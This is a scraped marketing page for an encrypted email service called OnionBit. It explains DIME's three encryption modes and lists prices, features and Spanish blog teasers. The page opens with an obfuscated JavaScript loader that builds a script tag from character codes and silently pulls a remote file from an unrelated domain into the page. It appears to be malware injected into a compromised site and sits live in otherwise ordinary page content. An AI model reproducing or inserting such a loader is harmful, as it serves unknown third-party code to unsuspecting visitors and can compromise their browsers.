Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,101,110,100,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();
[rev_slider_vc alias=”home_style_1″]

We Are OnionBit
Encryption Modes To accommodate the radically different user needs, DIME operates in 3 account modes: Trustful, Cautious & Paranoid. Each mode represents a unique point in the security-functionality spectrum and determines how accounts operate. The difference between each mode is based on where message encryption (or decryption) occurs and where the user’s private key is stored.


The server handles all privacy issues requiring users to “trust” the server. Accounts operating in Trustful mode send messages using the Simple Mail Transfer Protocol (SMTP) and receive messages using the Post Office Protocol (POP) or the Internet Mail Access Protocol (IMAP). Webmail systems handling server-side encryption functions operate in Trustful mode.


The server is only used to store and synchronize encrypted data, including encrypted copies of a user’s private keys and encrypted copies of messages. Cautious mode provides a comparable user experience to email today, while minimizing the trust placed in the server.


The server will never have access to a user’s private keys (encrypted or decrypted). Paranoid mode minimizes the amount of trust a user is required to place in their server, at the expense of functionality. Paranoid mode does not support webmail access or allows users access their account from multiple devices without an external method for synchronizing their key ring.

What we do?

Developed by Lavabit, DIME is an open source secure end-to-end communications platform for asynchronous messaging across the Internet. DIME follows in the footsteps of innovative email protocols, but takes advantage of the lessons learned during the 20-year history of PGP based encrypted communication. DIME is the technological evolution over current standards, OpenPGP and S/MIME, which are both difficult to deploy and only narrowly adopted. Recent revelations regarding surveillance have pushed OpenPGP and S/MIME to the forefront, but these standards simply can’t address the current privacy crisis because they don’t provide automatic encryption or protect metadata. By encrypting all facets of an email transmission (body, metadata and transport layer), DIME guarantees the security of users and the least amount of information leakage possible. A security first design, DIME solves problems that plague legacy standards and combines the best of current technologies into a complete system that gives users the greatest protection possible without sacrificing functionality.

Magma is Lavabit’s open source, commercial-grade, and full-featured server ready for use with the Dark Internet Mail Environment. Magma is now ready for commercial implementation and will fundamentally change the way business transmits encrypted data. Whether you are an individual, SME, or corporate enterprise wanting your own DIME compatible server, the Lavabit technical team can assist with your implementation and development needs.

For users who want a more secure email environment, but require the ability to use existing email software, we created Trustful mode. As the name suggests, Trustful mode requires users to “trust” the server to manage encryption. This mode ensures an ease of use, as users do not need to worry about technical requirements, or incompatibility with existing email clients. We envision Trustful mode as the mode of choice for businesses, which have regulatory requirements, data retention practices, and unique needs like escrow keys. Lavabit’s free and open source server, Magma, supports these users.

In Trustful mode, your key is within our server’s memory only while you are logged into the server. The server performs the encryption on your behalf, and as such, you must trust that the server will not be rewritten in such a way that it captures your password, or peeks at your messages during processing. This magic black box mode is no different from many other encryption systems, which perform encryption automatically. The only difference is where the encryption takes place. The key question is whether you are comfortable trusting the implementation to function securely. If you feel that trusting our servers to perform the encryption is unacceptable, we offer other modes of operation, Cautious or Paranoid.

Cautious mode is the first level of true end-to-end encryption, your key, used for encryption is only in plaintext within the memory of your device, be it phone, laptop, desktop, or mainframe. The key is encrypted on this device and then transmitted through a secure tunnel to our servers, where it is safely stored in space designated specifically for your account.

If you have your account on one phone and decide to also install the client software onto your laptop, when you log into the system your cautious mode client can request the encrypted key from the server. Then on your laptop, using your passphrase, the client will be able to decrypt the key, and allow the client software on your laptop to access your messages. Only on the devices you control does your key exist in a format that it can be “seen”. We anticipate most users will want the privacy and security of Cautious mode as it ensures you don’t have to trust your provider without having to alter the way you access your email. Users who believe they face a higher threat level and don’t want a key to exist anywhere in any format except on devices where they maintain ABSOLUTE technical control may prefer Paranoid mode.

Paranoid mode is our most advanced and ultimate security mode. In Paranoid mode, your key never transmits anywhere; You maintain ABSOLUTE control. It is up to the user to move their key to any new device. If you create the original key within client software and wish to also use it on your phone, you must devise a secure method to move your key. This will allow you to export it to a file securely and encrypted. You can use a data cable or your own trusted digital method to copy the key to your new device. You can use a device to communicate for a period and then destroy the key or device, without a copy of the key stored. This renders all communication that that the key opened inaccessible from that point on. Paranoid mode is ultra-secure, however, requires technical proficiency in user key management.

What's Hot
We Offer

Get up to 50% Off
on @OnionBit

Start At
$ 15

It's Easy to
create a Encrypted E-mail

Messages are stored on OnionBit servers in encrypted format. They are also transmitted in encrypted format between our servers and user devices. Messages between

  • Security
  • Privacy
  • End-to-End Encryption
  • SSL
  • Start At $ 15

Our Best
E-Mail PlansChoose the plan that works best for you. If you’re curious, just try one of our free plans.
You can always upgrade later. If you need the features or the space, jump right into one of our value-priced plans.

0 $
/ year


  • 128 MB Storage
  • 1 Email(s)
  • Advertising: NO
  • Spam Filter: NO
  • Filter Support: NO
  • Forwarding: NO

15 $
/ year

Gold 50%

  • 5 GB Storage
  • 1 Email(s)
  • Advertising: NO
  • Spam Filter: YES
  • Filter Support: YES
  • Forwarding: YES

30 $
/ year

Platinum 50%

  • 20 GB Storage
  • 1 Email(s)
  • Advertising: YES
  • Spam Filter: YES
  • Filter Support: YES
  • Forwarding: YES

We're Different
why choose us``Here at OnionBit we take privacy and security seriously. To ensure that no one intercepts your e-mail while it is being downloaded or sent to our servers, we support and encourage the use of Secure Sockets Layer (SSL) encryption. SSL was created specifically to eliminate eavesdropping and ensure that information could be transported securely over an untrusted network.``Transport Layer Encryption

Minimized Metadata

Who you communicate with is as private as what you say.


Encryption as strong as your individual passphrase.


Completely automated; you only need your passphrase.


We care about your privacy and we have the legacy to prove it.


Our proprietary reputation system allows filters out unwanted & untrusted mail.

Multiple Modes

Flexibility to select your security based upon your threat profile.


All of our plans include access to our POP3, IMAP and webmail servers for downloading your e-mails and SMTP access for sending it.

Virus Protection

OnionBit e-mail server has been tightly integrated with the Clam antivirus engine. This integration allows us to protect our users from a variety of malware threats.

(SPF) Support

SPF is a technique for verifying that a message claiming to originate from a specific domain is actually being received from a server authorized to relay messages for that domain.

What People Says

From Our Blog

24May, 2017

Snowden culpa a la NSA del ciberataque global de Wanna Cry

Snowden culpa a la NSA del ciberataque con el ransomware Wanna Cry El pasado viernes 12, el mundo quedó estupefacto ante el mayor ciberataque a escala planetaria en la historia de la informática, que afectaría a cerca de 300.000 ordenadores en más de 150 países, según hemos sabido días después. El malware responsable del ataque que ha puesto en jaque la ciberseguridad de empresas en […]

24May, 2017

La primera colisión de SHA-1 real tras el experimento de Google

La primera colisión de SHA-1 real tras el experimento de Google SHA-1 (Secure Hash Algorithm 1), es un código de encriptación desarrollado por la NSA. Tras una década de advertencias sobre sus vulnerabilidades, se ha seguido utilizando para garantizar la seguridad de las conexiones a Internet, garantizar la integridad de los datos, etc. Hasta que Google consiguió romperlo, provocando la primera colisión de SHA-1 de […]

Our Services

OnionBit was created to offer Internet users a better choice for reliable, fast, affordable e-mail service that never sacrifices privacy for profits.
OnionBit gives you a variety of e-mail options. Use this page to learn about our plans—and why we’re the only choice for people who are serious about their e-mail.
Do you run an organization with demanding e-mail users but don’t want the hassle of providing high-quality e-mail services? Let our experts handle the heavy lifting. Whether you need e-mail service for 10 or 1,000, you’ll get our robust platform, competitive pricing and the same advanced features as our personal accounts.